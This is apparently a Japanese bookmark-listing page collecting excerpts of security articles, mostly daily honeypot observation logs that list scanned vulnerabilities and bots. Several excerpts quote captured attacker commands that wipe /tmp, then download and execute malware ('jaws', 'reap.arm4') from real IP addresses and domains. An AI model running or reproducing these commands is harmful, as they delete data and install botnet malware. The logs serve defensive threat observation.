オフェンシブ視点による Cloud Security 入門 ~AWS 編~ - blog of morioka12
1. 始めに こんにちは、morioka12 です。 本稿では、AWS 環境における攻撃者のオフェンシブな視点で Cloud Security の入門として紹介します。 1. 始めに 免責事項 想定読者 2. クラウドにおける脅威 クラウドの重大セキュリティ脅威 11の悪質な脅威 クラウドサービス利用に関連するリスク Top 10 AWS セキュリティ構成ミス Top 10 3. AWS 環境における攻撃者の観点 3.1 AWS 環境の外部からの観点 3.2 AWS 環境の内部からの観点 4. MITRE ATT&CK Framework for Cloud (IaaS) 4.1 初期アクセス (Initial Access) 4.2 実行 (Execution) 4.3 永続化 (Persistence) 4.4 権限昇格 (Privilege Escalation) 4.5 防御回避
汎用ポリシー言語Rego + OPAと認可・検証事例の紹介 / Introduction Rego & OPA for authorization and validation
高機能ハニーポット(T-Pot 22.04)をさくらのクラウドに構築して攻撃を観測する | さくらのナレッジ
はじめに 皆さんはハニーポットというのはご存知でしょうか。ハニーポットとは、悪意のある攻撃を受けるように設計された「罠」や「おとり」になるサーバーやネットワークのことです。最新のサイバー攻撃やマルウェアの動向を探ったり分析したりするために用いられるものです。 T-Potとは T-Potは主にDockerを用いて構成されているマルチハニーポットプラットフォームで、様々なツールや罠が用意されています。複雑な設定を必要としないにも関わらず様々な機能を利用できるのが特徴です。ただしその分、要求スペックが高いのもまた特徴です。 T-Potはあくまでマルチハニーポットプラットフォームであり、複数のハニーポットを集めたものになります。以下の画像を見るとどのようなハニーポットがどこのポートでListenされているかわかります。 今回はこのT-Potをさくらのクラウド上に設置してサイバー攻撃を観測してみたい
React is easily one of the single most popular libraries in use today. Given that it was made within a juggernaut like Facebook, you might have assumed it was always destined for success. But what if we told you that React’s first brush with the public sphere was anything but glamorous? React.js: The Documentary brings you the full story behind the early days of React, focusing on the dedicated gr
NTT Comグループ セキュリティワークショップ『ハニーポッターになろう』を開催しました | NTT Communications Developer Portal
はじめまして、技術開発部セキュリティユニットの神田です。 2月7日、21日にNTT Comグループ社員を対象にセキュリティワークショップ『ハニーポッターになろう ~インターネットの今を知って正しく怖がる~』を開催しました。本記事では、その内容や当日の様子について紹介します。 セキュリティワークショップ『ハニーポッターになろう ~インターネットの今を知って正しく怖がる~』 このワークショップは、NTT Comグループ内セキュリティコミュニティの有志を中心として完全内製で企画、開催されました。開催の主な目的は以下の通りです。 インターネットを取り巻く脅威の現状を体感し、理解を深める ハニーポットの運用や分析に必要な視点を習得する セキュリティコミュニティの活性化(交流の促進) ワークショップは二部構成のグループワーク形式で、第一部(2/7)でハニーポットを構築後、2週間のログ収集期間をおいて、
ハニートークン型ハニーポットによる攻撃者の行動分析と脆弱性の発見と報告まで / AWS HoneyToken HoneyPot
2021年3月20日のJAWS DAYS 2021で登壇した資料です。 https://jawsdays2021.jaws-ug.jp/timetable/track-b-1000/
2019年10月のハニーポット観察記録。100万回を超えるMySQLへの攻撃を観測(大元隆志) - エキスパート - Yahoo!ニュース
サイバー攻撃は日々変化しており、サイバー攻撃者の手口やトレンドを知ることは対策を考える上で貴重なデータとなる。こういったサイバー攻撃者の手口を知るツールとして、ハニーポットというツールが存在する。ハニーポットとは、わざとサイバー攻撃を受ける「囮サーバー」を設置し、サイバー攻撃者の手口や、トレンドを把握するというもの。 2019年10月1日から31日までの期間に、AWS上に設置したハニーポットで検知したサイバー攻撃についてレポートする。 ■ハニーポットの構成 本レポートで使用したハニーポットはAWSの東京リージョンに設置されており、AWSのパブリックIPアドレスを割り当て、パブリックDNSは割り当てていない。AWSのセキュリティグループはハニーポットにログインするポート番号以外は全てオープンとなっている。「AWSのセキュリティグループの設定を誤るとこんな攻撃を受ける」という視点で見て貰うと、
世界で愛用されているメールフォーム プラグインContact Form 7の設定、データ保存、スパム対策、バリデーションなど、カスタマイズから便利なプラグインをご紹介します。 WordPressのフォームプラグインでは「Contact Form 7」と「MW WP Form」が人気です。 MW WP Formは標準で「問い合わせデータの保存」「確認、エラー、完了ページ」の設定も可能となっています。 それでもContact Form 7をお薦めするのは豊富なアドオンプラグインがあるからです。 MW WP Formを導入しても、お客様の要望に答えられない事が多々ありContact Form 7へ乗り換える事も少なくありません。 アドオンを利用することで、スピーディーでコストを抑えることも可能となります。 Contact Form 7設置の流れ 設定画面でフォームを作成する メールの設定 自動返
前回のあらすじ 3年ほど前にAWS上にハニーポット環境を作成しました。 大雑把に説明すると、(主に)AWSのEC2インスタンスあてにどのようなexploitが飛んでくるのか?というのを知るために、 EC2インスタンスに管理用、および観測用のElastic IP addressを設定し、そこでハニーポットを動かす ハニーポットで取得した生データ(pcap)をS3に保存し、Lambdaで分析する 分析結果は CloudWatch Logs Insights で閲覧できるようにする という構成にしていました。これはこれでマネージドサービスを使った面白い構成だったと当時は思っていたのですが、実際に動かしてみるといくつかの課題があり、最終的には運用を止めてしまいました。 前回の課題 1) Elastic IP addressの制限でスケールしにくい EC2は自前で2つ以上のネットワークインターフェー
ハニーポット(仮) 観測記録 2020/04/20分です。 特徴 Location:JP DrayTek製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス クラウド環境のメタデータ情報を狙うアクセス AWS Security Scannerによるスキャン行為 polaris botnetによるスキャン行為 zgrabによるスキャン行為 phpMyAdminへのスキャン行為 18[.]179[.]20[.]5に関する不正通信 を確認しました。 Location:US DrayTek製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス Huaweiルータの脆弱性を狙うアクセス NetGear製品の脆弱性を狙うアクセス ThinkPHPの脆弱性を狙うアクセス po
ハニーポット(仮) 観測記録 2022/01/17分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス /.envへのスキャン行為 Laravelへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス aiohttpによるスキャン行為 curlによるスキャン行為 zgrabによるスキャン行為 .cssへのスキャン行為 /.gitへのスキャン行為 Apache Solrへのスキャン行為 WordPressへのスキャン行為 UserAgentがHel
ハニーポット(仮) 観測記録 2022/01/05分です。 特徴 共通 Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Laravelへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP GPONルータの脆弱性を狙うアクセス ZmEuによるスキャン行為 gbrmssによるスキャン行為 /.gitへのスキャン行為 Apache Solrへのスキャン行為 WordPressへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Th
ハニーポット(仮) 観測記録 2023/07/20分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス NetGear製品の脆弱性を狙うアクセス Nmap Scripting Engineによるスキャン行為 l9scanによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget testbots.
ハニーポット(仮) 観測記録 2022/01/18分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス NetGear製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス aiohttpによるスキャン行為 zgrabによるスキャン行為 /.gitへのスキャン行為 Apache Solrへのスキャン行為 Apache Tomcatへのスキャン行為 Laravelへのスキ
ハニーポット(仮) 観測記録 2022/01/06分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス /.envへのスキャン行為 Apache Solrへのスキャン行為 Laravelへのスキャン行為 Location:JP Spring Bootの脆弱性を狙うアクセス aiohttpによるスキャン行為 zgrabによるスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US JBossの脆弱性を狙うアクセス Or
ハニーポット(仮) 観測記録 2022/01/11分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Laravelへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 5.188.210.227に関する不正通信 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス
AWSのLightSailが少し安くなっていた。 RAM 1Gでも$5なのでとてもおすすめ。 前回のハニーポットはRAM 500Mで制限がとても多かったのでいっそのこと最初から作り直した。 作るのに4日くらいかかった。その代わりSystemdやrsyslogとか若干わかるようになった。うれしい。 便宜上、suricataとufwもハニポってことにしてるけど許してくださいな。 構成 AWSのVPSに各ハニーポット等を設置して、それらをS3にいったんアップロード。 自宅のPCにインストールしたELKにてログを収集して分析する。 前回と比べてufwとdionaeaが追加された。 使用したもの Suricata IDSとして動作。 アクセスを一般的なシグネチャにマッチさせることでどのような攻撃が来たかをパッとで判断できる。 Dionaea 様々なポートに対するアクセスをキャプチャできるハニーポット
ハニーポット(仮) 観測記録 2022/10/20分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス KrebsOnSecurityによるスキャン行為 curlによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス NetGear製品の脆弱性を狙うアクセス KrebsOnSecurityによるスキャン行為 masscan-ngによるスキャン行為 webprosbotによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 WordPressへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm 6o1; wget ht
ハニーポット(仮) 観測記録 2023/10/09分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス CensysInspectによるスキャン行為 /.gitへのスキャン行為 Laravelへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 を確認しました。 Location:UK Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス .jsへのス
ハニーポット(仮) 観測記録 2023/12/13分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP phpMyAdminへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 IDBTE4M CODE87によるスキャン行為 /.gitへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:UK Spring Cloud Gatewayの脆弱性(CVE-2022-2
ハニーポット(仮) 観測記録 2023/12/19分です。 特徴 共通 Spring Bootの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP curlによるスキャン行為 /.gitへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 curlによるスキャン行為 .jsへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:UK Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 phpMyAdmi
ハニーポット(仮) 観測記録 2023/06/29分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス IDBTE4M CODE87によるスキャン行為 /.gitへのスキャン行為 45.89.127.18に関する不正通信 5.188.210.227に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 103.16.161.29/jaws; sh /tmp/jaws cd /tmp;
ハニーポット(仮) 観測記録 2022/08/27分です。 特徴 共通 Spring Bootの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス aiohttpによるスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws Location:US D-link製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-202
ハニーポット(仮) 観測記録 2022/08/30分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス .cssへのスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws Location:US PHPUnitの脆弱性(CVE-2017-9841)を
ハニーポット(仮) 観測記録 2022/01/29分です。 特徴 共通 D-link製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス .jsへのスキャン行為 /.envへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス NetGear製品の脆弱性を狙うアクセス ThinkPHPの脆弱性を狙うアクセス zgrabによるスキャン行為 /.awsへのスキャン行為 Apache Solrへのスキャン行為 45.81.232.239に関する不正通信 Gh0stRATのような動き を確認しました。 Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙
ハニーポット(仮) 観測記録 2021/01/01分です。 特徴 Location:JP GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス NetGear製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス Shellshock(CVE-2014-7169)脆弱性を狙うアクセス ThinkPHPの脆弱性を狙うアクセス ZmEuによるスキャン行為 Apache Solrへのスキャン行為 Apache Tomcatへのスキャン行為 phpMyAdminへのスキャン行為 WordPress Pluginへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Ser
ハニーポット(仮) 観測記録 2019/10/26分です。 特徴 Region:AP ThinkPHPの脆弱性を狙うアクセス (今までとは違ったパターンも観測しました) Shenzhen TVT製品の脆弱性を狙うアクセス phpMyAdminに対するスキャン行為 Dockerfileに対するアクセス を確認しました。 Region:US HiSilicon DVR Devicesの脆弱性を狙うアクセス ThinkPHPの脆弱性を狙うアクセス (今までとは違ったパターンも観測しました) Shenzhen TVT製品の脆弱性を狙うアクセス phpMyAdminに対するスキャン行為 ZmEuによるスキャン行為 を確認しました。 Region:EU Dockerfileに対するアクセス phpMyAdminに対するスキャン行為 ZmEuによるスキャン行為 を確認しました。 他 アクセス数推移 AP
ハニーポット(仮) 観測記録 2022/05/17分です。 特徴 共通 Axis製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス Spring Bootの脆弱性を狙うアクセス /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 5.188.210.227に関する不正通信 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 141.95.84.78/jaws; sh /tmp/jaws cd /tmp; rm -rf
ハニーポット(仮) 観測記録 2022/12/14分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Apache Tomcatへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 を確認しました。 Location:US CensysInspectによるスキャン行為 /.gitへのスキャン行為 を確認しました。 Location:UK D-link製品の脆弱性を狙うアクセス aiohttpによるスキャン行為 /.gi
ハニーポット(仮) 観測記録 2024/02/13分です。 特徴 共通 D-link製品の脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP JBossの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス Gulper Web Botによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.dockerへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 Laravelへのスキャン行為 WordPressへのスキャン行為 configファイルへのスキャン行為 phpMyAdminへのスキャン行為
ハニーポット(仮) 観測記録 2023/02/23分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 aiohttpによるスキャン行為 node-fetchによるスキャン行為 okhttpによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 107.6.255.132/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mo
ハニーポット(仮) 観測記録 2023/01/11分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 Location:JP .jsへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.95.55.202/reaper/reap.arm4; chmod 777 /tmp/reap.arm4; sh /tmp/reap.arm4 Location:US Apache HTTP Serverの
ハニーポット(仮) 観測記録 2023/01/25分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス Apache Tomcatへのスキャン行為 phpMyAdminへのスキャン行為 112.124.42.80に関する不正通信 5.188.210.227に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.12.253.180/jaws; sh /tm
ハニーポット(仮) 観測記録 2023/04/28分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス FCKEditorの脆弱性を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 167.71.210.63/jaws; sh /tmp/jaws Location:US D-link製品の脆弱性を狙うアクセス F5 BIG-IP製
ハニーポット(仮) 観測記録 2023/07/17分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス GPONルータの脆弱性を狙うアクセス aiohttpによるスキャン行為 /.gitへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget testbots.maizhangyu.top/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 94.158.247.123/jaws; sh /tmp/jaws cd /tmp
ハニーポット(仮) 観測記録 2023/01/19分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス CensysInspectによるスキャン行為 aiohttpによるスキャン行為 masscanによるスキャン行為 /.gitへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス CensysInspectによるスキャン行為 aiohttp
ハニーポット(仮) 観測記録 2021/12/31分です。 特徴 共通 gbrmssによるスキャン行為 Location:JP GPONルータの脆弱性を狙うアクセス NetGear製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス curlによるスキャン行為 zgrabによるスキャン行為 .cssへのスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 85.206.160.115に関する不正通信 を確認しました。 Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス GPONルータの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性
ハニーポット(仮) 観測記録 2023/11/17分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 curlによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 phpMyAdminへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Gh0stRATのような動き を確認しました。 Location:UK GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 phpMyAdminへのスキャン行為 を
ハニーポット(仮) 観測記録 2020/01/28分です。 (気付いたら、継続期間が1年を超えていました。 特徴 Location:JP PHPUnit(CVE-2017-9841)の脆弱性を狙うアクセス ThinkPHPの脆弱性を狙うアクセス クラウド環境のメタデータ情報を狙うアクセス AWS Security Scannerによるスキャン行為 zgrabによるスキャン行為 Apache Tomcat管理画面へのスキャン行為 Apache Solrへのスキャン行為 phpMyAdminへのスキャン行為 /.envへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対して、コマンド実行を狙う以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget http://111[.]43[.]223[.]133:4155
ハニーポット(仮) 観測記録 2023/11/02分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 curlによるスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 configファイルへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.142.182.72/reallynightmare.sh; chmod 777 *; sh reallynightmare.sh?jaws cd /tmp; rm -rf *; wget https://pvp-ri
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Honeypot_on_GCP-20191006.pdf
React.js: The Documentary - YouTube
令和も使えるContact Form 7の設定とカスタマイズで最高のフォームにする方法
クラウドネイティブハニーポット on AWS 2022春の陣
2020/04/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/01/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/01/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/07/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/01/18 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/01/06 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/01/11 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポットをパワーアップさせた。 - birabiraのめも
2022/10/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/10/09 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/12/13 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/12/19 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/06/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/08/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/08/30 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/01/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2021/01/01 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2019/10/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/05/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2022/12/14 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2024/02/13 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/02/23 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/01/11 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/01/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/04/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/07/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/01/19 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2021/12/31 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/11/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2020/01/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
2023/11/02 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ